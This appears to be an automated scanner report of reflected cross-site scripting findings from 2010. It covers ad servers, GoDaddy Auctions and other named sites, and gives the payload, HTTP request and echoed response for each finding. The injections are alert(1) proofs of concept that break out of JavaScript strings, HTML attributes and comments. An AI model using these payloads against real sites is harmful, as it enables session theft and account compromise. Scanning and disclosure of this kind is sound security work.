Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 457 Date: Sun, 14 Nov 2010 23:03:13 GMT Connection: close Vary: Accept-Encoding Set-Cookie: dc=dal; domain=collective-media.net; path=/; expires=Tue, 14-Dec-2010 23:03:13 GMT
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d8f00'-alert(1)-'fd033e733cd was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 454 Date: Sun, 14 Nov 2010 23:03:08 GMT Connection: close Vary: Accept-Encoding Set-Cookie: dc=dal; domain=collective-media.net; path=/; expires=Tue, 14-Dec-2010 23:03:08 GMT
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 137a4'-alert(1)-'161cf7d1c7b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj137a4'-alert(1)-'161cf7d1c7b/q1.mng_bang/news_fr;sz=728x90;net=q1;ord=1289775746.342466; HTTP/1.1 Host: a.collective-media.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dc=dal; bkdp=1; blue=1; cli=11c4bc59fd87e17; JY57=3LjyTUOLJDCESzPtVdU9eUE0yOWzsN33CiJtgRMLbrpLE-GaRmaKZGw; nadp=1; qcdp=1;
Response
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 7210 Date: Sun, 14 Nov 2010 23:04:31 GMT Connection: close
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-25684700_1289775871","http://ad.doubleclick.net/adj137a4'-alert(1)-'161cf7d1c7b/q1.mng_bang/news_fr;net=q1;u=,q1-25684700_1289775871,11c4bc59fd87e17,none,cm.pb8k-cm.cm_xpd6_rtg-q1.none_h;;cmw=nurl;sz=728x90;net=q1;contx=none;dc=d;btg=cm.pb8k;btg=cm.cm_xpd6_rtg;btg=q1.none_h;ord=1 ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e53d'-alert(1)-'e6ce7147582 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj/q1.mng_bang9e53d'-alert(1)-'e6ce7147582/news_fr HTTP/1.1 Host: a.collective-media.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dc=dal; bkdp=1; blue=1; cli=11c4bc59fd87e17; JY57=3LjyTUOLJDCESzPtVdU9eUE0yOWzsN33CiJtgRMLbrpLE-GaRmaKZGw; nadp=1; qcdp=1;
Response
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 7156 Date: Sun, 14 Nov 2010 23:04:23 GMT Connection: close
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-19828667_1289775863","http://ad.doubleclick.net//q1.mng_bang9e53d'-alert(1)-'e6ce7147582/news_fr;net=q1;u=,q1-19828667_1289775863,11c4bc59fd87e17,none,cm.pb8k-cm.cm_xpd6_rtg-q1.none_h;;contx=none;dc=d;btg=cm.pb8k;btg=cm.cm_xpd6_rtg;btg=q1.none_h?","0","0",false);</scr'+'ipt> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d80db'-alert(1)-'232fd6d5621 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj/q1.mng_bang/news_frd80db'-alert(1)-'232fd6d5621 HTTP/1.1 Host: a.collective-media.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dc=dal; bkdp=1; blue=1; cli=11c4bc59fd87e17; JY57=3LjyTUOLJDCESzPtVdU9eUE0yOWzsN33CiJtgRMLbrpLE-GaRmaKZGw; nadp=1; qcdp=1;
Response
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 7156 Date: Sun, 14 Nov 2010 23:04:24 GMT Connection: close
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-36731208_1289775864","http://ad.doubleclick.net//q1.mng_bang/news_frd80db'-alert(1)-'232fd6d5621;net=q1;u=,q1-36731208_1289775864,11c4bc59fd87e17,none,cm.pb8k-cm.cm_xpd6_rtg-q1.none_h;;contx=none;dc=d;btg=cm.pb8k;btg=cm.cm_xpd6_rtg;btg=q1.none_h?","0","0",false);</scr'+'ipt> ...[SNIP]...
3.8. http://a.collective-media.net/cmadj/q1.mng_bang/news_fr [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://a.collective-media.net
Path:
/cmadj/q1.mng_bang/news_fr
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 72e02'-alert(1)-'70775120aca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj/q1.mng_bang/news_fr?72e02'-alert(1)-'70775120aca=1 HTTP/1.1 Host: a.collective-media.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dc=dal; bkdp=1; blue=1; cli=11c4bc59fd87e17; JY57=3LjyTUOLJDCESzPtVdU9eUE0yOWzsN33CiJtgRMLbrpLE-GaRmaKZGw; nadp=1; qcdp=1;
Response
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 7159 Date: Sun, 14 Nov 2010 23:04:21 GMT Connection: close
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-66804179_1289775861","http://ad.doubleclick.net//q1.mng_bang/news_fr?72e02'-alert(1)-'70775120aca=1;net=q1;u=,q1-66804179_1289775861,11c4bc59fd87e17,none,cm.pb8k-cm.cm_xpd6_rtg-q1.none_h;;contx=none;dc=d;btg=cm.pb8k;btg=cm.cm_xpd6_rtg;btg=q1.none_h?","0","0",false);</scr'+'ipt> ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c3d68'-alert(1)-'4a0e64c7f72 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e026"><script>alert(1)</script>ad814dac87d was submitted in the fpid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the m request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 26281'-alert(1)-'0c55ba31e43 was submitted in the m parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
3.12. http://ads.specificmedia.com/serve/v=5 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ads.specificmedia.com
Path:
/serve/v=5
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5bea1'-alert(1)-'dbc8ca0f6a1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the PID request parameter is copied into the HTML document as plain text between tags. The payload fafd7<img%20src%3da%20onerror%3dalert(1)>ce4f20f87e3 was submitted in the PID parameter. This input was echoed as fafd7<img src=a onerror=alert(1)>ce4f20f87e3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
HTTP/1.0 200 OK Server: Apache-Coyote/1.1 X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5 Pragma: no-cache Cache-Control: no-cache Content-Type: text/plain;charset=UTF-8 Date: Mon, 15 Nov 2010 00:43:02 GMT X-Cache: MISS from feeds.theplatform.com Via: 1.0 sea1squid02 (squid/3.0.STABLE23) Connection: close
"The PID looks like it was cut-off (\"oUFmCcyEZuCA7UqChCElKJFTJxFcgO9Gfafd7<img src=a onerror=alert(1)>ce4f20f87e3\"). This PID is 76 character(s) long, when it should be 32 characters long."
The value of the query request parameter is copied into the HTML document as plain text between tags. The payload ff556<img%20src%3da%20onerror%3dalert(1)>4349ba1ee07 was submitted in the query parameter. This input was echoed as ff556<img src=a onerror=alert(1)>4349ba1ee07 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of the ci request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d78be"%3balert(1)//d2ac33e709a was submitted in the ci parameter. This input was echoed as d78be";alert(1)//d2ac33e709a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?ci=13117d78be"%3balert(1)//d2ac33e709a&isc=GPPT03A117&domain=sftimes.com HTTP/1.1 Host: auctions.godaddy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 14 Nov 2010 23:08:37 GMT Server: Microsoft-IIS/6.0 P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: isc=GPPT03A117; domain=.godaddy.com; path=/ Set-Cookie: ASP.NET_SessionId=vwx4pw45xf1n4zywv0gdvx45; path=/; HttpOnly Set-Cookie: traffic=cookies=1&referrer=&sitename=auctions.godaddy.com&page=/trpHome.aspx&server=DNAWEB03&status=200 OK&querystring=ci=13117d78be%22%3balert(1)%2f%2fd2ac33e709a&isc=GPPT03A117&domain=sftimes.com&shopper=&privatelabelid=1&isc=GPPT03A117&clientip=174.122.23.218&referringpath=; domain=godaddy.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 210262
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><tit ...[SNIP]... <script type="text/javascript"> function AddMembershipToCart() { setCookie("IDPLoginRedirect", "https://auctions.godaddy.com/trpHome.aspx?ci=13117d78be";alert(1)//d2ac33e709a&isc=GPPT03A117&domain=sftimes.com"); if (getObj("ctl00_cphMaster_tbBidAmount")) { setCookie("IDPBid", getObj("ctl00_cphMaster_tbBidAmount").value); } else if (getObj("ctl00_cphMaster ...[SNIP]...
The value of the ci request parameter is copied into a JavaScript rest-of-line comment. The payload 6c4df%0aalert(1)//42f0cddfa42 was submitted in the ci parameter. This input was echoed as 6c4df alert(1)//42f0cddfa42 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?ci=131176c4df%0aalert(1)//42f0cddfa42&isc=GPPT03A117&domain=sftimes.com HTTP/1.1 Host: auctions.godaddy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 14 Nov 2010 23:08:39 GMT Server: Microsoft-IIS/6.0 P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: isc=GPPT03A117; domain=.godaddy.com; path=/ Set-Cookie: ASP.NET_SessionId=wrqsrz452daet5ecdizpbbnt; path=/; HttpOnly Set-Cookie: traffic=cookies=1&referrer=&sitename=auctions.godaddy.com&page=/trpHome.aspx&server=DNAWEB03&status=200 OK&querystring=ci=131176c4df%0aalert(1)%2f%2f42f0cddfa42&isc=GPPT03A117&domain=sftimes.com&shopper=&privatelabelid=1&isc=GPPT03A117&clientip=174.122.23.218&referringpath=; domain=godaddy.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 209523
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the ci request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17699"style%3d"x%3aexpression(alert(1))"651a2b61a83 was submitted in the ci parameter. This input was echoed as 17699"style="x:expression(alert(1))"651a2b61a83 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /?ci=1311717699"style%3d"x%3aexpression(alert(1))"651a2b61a83&isc=GPPT03A117&domain=sftimes.com HTTP/1.1 Host: auctions.godaddy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 14 Nov 2010 23:08:35 GMT Server: Microsoft-IIS/6.0 P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: isc=GPPT03A117; domain=.godaddy.com; path=/ Set-Cookie: ASP.NET_SessionId=1lznjf45ui030teszo4b4ijt; path=/; HttpOnly Set-Cookie: traffic=cookies=1&referrer=&sitename=auctions.godaddy.com&page=/trpHome.aspx&server=DNAWEB03&status=200 OK&querystring=ci=1311717699%22style%3d%22x%3aexpression(alert(1))%22651a2b61a83&isc=GPPT03A117&domain=sftimes.com&shopper=&privatelabelid=1&isc=GPPT03A117&clientip=174.122.23.218&referringpath=; domain=godaddy.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 209894
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the domain request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 96ca7"%3balert(1)//7e769ef789a was submitted in the domain parameter. This input was echoed as 96ca7";alert(1)//7e769ef789a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?isc=gppt02C007&domain=sftimes.com96ca7"%3balert(1)//7e769ef789a HTTP/1.1 Host: auctions.godaddy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 14 Nov 2010 23:11:17 GMT Server: Microsoft-IIS/6.0 P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: isc=gppt02C007; domain=.godaddy.com; path=/ Set-Cookie: ASP.NET_SessionId=lzq1nt55ofi2tt55amvykt45; path=/; HttpOnly Set-Cookie: traffic=cookies=1&referrer=&sitename=auctions.godaddy.com&page=/trpHome.aspx&server=DNAWEB03&status=200 OK&querystring=isc=gppt02C007&domain=sftimes.com96ca7%22%3balert(1)%2f%2f7e769ef789a&shopper=&privatelabelid=1&isc=gppt02C007&clientip=174.122.23.218&referringpath=; domain=godaddy.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 209789
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><tit ...[SNIP]... <script type="text/javascript"> function AddMembershipToCart() { setCookie("IDPLoginRedirect", "https://auctions.godaddy.com/trpHome.aspx?isc=gppt02C007&domain=sftimes.com96ca7";alert(1)//7e769ef789a"); if (getObj("ctl00_cphMaster_tbBidAmount")) { setCookie("IDPBid", getObj("ctl00_cphMaster_tbBidAmount").value); } else if (getObj("ctl00_cphMaster_tbOfferAmount")) { setCooki ...[SNIP]...
The value of the domain request parameter is copied into a JavaScript rest-of-line comment. The payload a2165%0aalert(1)//163af430c02 was submitted in the domain parameter. This input was echoed as a2165 alert(1)//163af430c02 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?isc=gppt02C007&domain=sftimes.coma2165%0aalert(1)//163af430c02 HTTP/1.1 Host: auctions.godaddy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 14 Nov 2010 23:11:19 GMT Server: Microsoft-IIS/6.0 P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: isc=gppt02C007; domain=.godaddy.com; path=/ Set-Cookie: ASP.NET_SessionId=zzdqwy55liflezmzqlrf0pnu; path=/; HttpOnly Set-Cookie: traffic=cookies=1&referrer=&sitename=auctions.godaddy.com&page=/trpHome.aspx&server=DNAWEB03&status=200 OK&querystring=isc=gppt02C007&domain=sftimes.coma2165%0aalert(1)%2f%2f163af430c02&shopper=&privatelabelid=1&isc=gppt02C007&clientip=174.122.23.218&referringpath=; domain=godaddy.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 209764
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3.20. https://auctions.godaddy.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://auctions.godaddy.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript rest-of-line comment. The payload f5f88%0aalert(1)//18c6c8e3c8d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f5f88 alert(1)//18c6c8e3c8d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?f5f88%0aalert(1)//18c6c8e3c8d=1 HTTP/1.1 Host: auctions.godaddy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 14 Nov 2010 23:08:39 GMT Server: Microsoft-IIS/6.0 P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=c1yviejda3oh2snze4wofx55; path=/; HttpOnly Set-Cookie: traffic=cookies=1&referrer=&sitename=auctions.godaddy.com&page=/trpHome.aspx&server=DNAWEB03&status=200 OK&querystring=f5f88%0aalert(1)%2f%2f18c6c8e3c8d=1&shopper=&privatelabelid=1&isc=&clientip=174.122.23.218&referringpath=; domain=godaddy.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 209402
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3.21. https://auctions.godaddy.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://auctions.godaddy.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9be2e"%3balert(1)//2e07d29c569 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9be2e";alert(1)//2e07d29c569 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?9be2e"%3balert(1)//2e07d29c569=1 HTTP/1.1 Host: auctions.godaddy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 14 Nov 2010 23:08:37 GMT Server: Microsoft-IIS/6.0 P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=es4x3t3m5fzfzauv4wge2t55; path=/; HttpOnly Set-Cookie: traffic=cookies=1&referrer=&sitename=auctions.godaddy.com&page=/trpHome.aspx&server=DNAWEB03&status=200 OK&querystring=9be2e%22%3balert(1)%2f%2f2e07d29c569=1&shopper=&privatelabelid=1&isc=&clientip=174.122.23.218&referringpath=; domain=godaddy.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 210223
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><tit ...[SNIP]... <script type="text/javascript"> function AddMembershipToCart() { setCookie("IDPLoginRedirect", "https://auctions.godaddy.com/trpHome.aspx?9be2e";alert(1)//2e07d29c569=1"); if (getObj("ctl00_cphMaster_tbBidAmount")) { setCookie("IDPBid", getObj("ctl00_cphMaster_tbBidAmount").value); } else if (getObj("ctl00_cphMaster_tbOfferAmount")) { setCoo ...[SNIP]...
3.22. http://bayarea.localhires.com/job_fairs/view/1039 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://bayarea.localhires.com
Path:
/job_fairs/view/1039
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c45e"><script>alert(1)</script>093fc53e67a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /job_fairs/view/1039?9c45e"><script>alert(1)</script>093fc53e67a=1 HTTP/1.1 Host: bayarea.localhires.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 01:59:26 GMT Server: Apache Served-By: Joyent Set-Cookie: Localhires=895qnvadt9mj5agn5njgpf9hjq5al4ks; expires=Thu, 15-Nov-2035 07:59:26 GMT; path=/; domain=.localhires.com P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: last_fair_id=1039 Set-Cookie: Localhires=895qnvadt9mj5agn5njgpf9hjq5al4ks; expires=Thu, 15-Nov-2035 07:59:26 GMT; path=/; domain=.localhires.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 39305
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head> <meta http-equiv="Conten ...[SNIP]... <a class="addthis_button" href="http://www.addthis.com/bookmark.php?v=152&pub=xa-4ab7c54d65a99a54" onMouseOver="return addthis_open(this, '', 'http://bayarea.localhires.com/job_fairs/view/1039?9c45e"><script>alert(1)</script>093fc53e67a=1', 'San Jose Job Fair on November 16th, 2010 on Tuesday, November 16, 2010')" onMouseOut="addthis_close()" onClick="return addthis_sendto()" rel="nofollow"> ...[SNIP]...
The value of the search request parameter is copied into the HTML document as plain text between tags. The payload 4d577<script>alert(1)</script>4e5c6690b88 was submitted in the search parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ads/search?search=4d577<script>alert(1)</script>4e5c6690b88&cat=561&fq=categoryid:903&listtype=1 HTTP/1.1 Host: bayareamarketplace.kaango.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=0bdbf11e73ab5ff78a1f8da6916f0855;
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Date: Mon, 15 Nov 2010 01:59:43 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Server: Apache X-Powered-By: PHP/5.3.3 Connection: Close Content-Length: 43965
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
...[SNIP]... <p> Bay Area Marketplace:
0 search results for '4d577<script>alert(1)</script>4e5c6690b88' within 100 miles from San Jose, California
in category Autos: Services & Parts </p> ...[SNIP]...
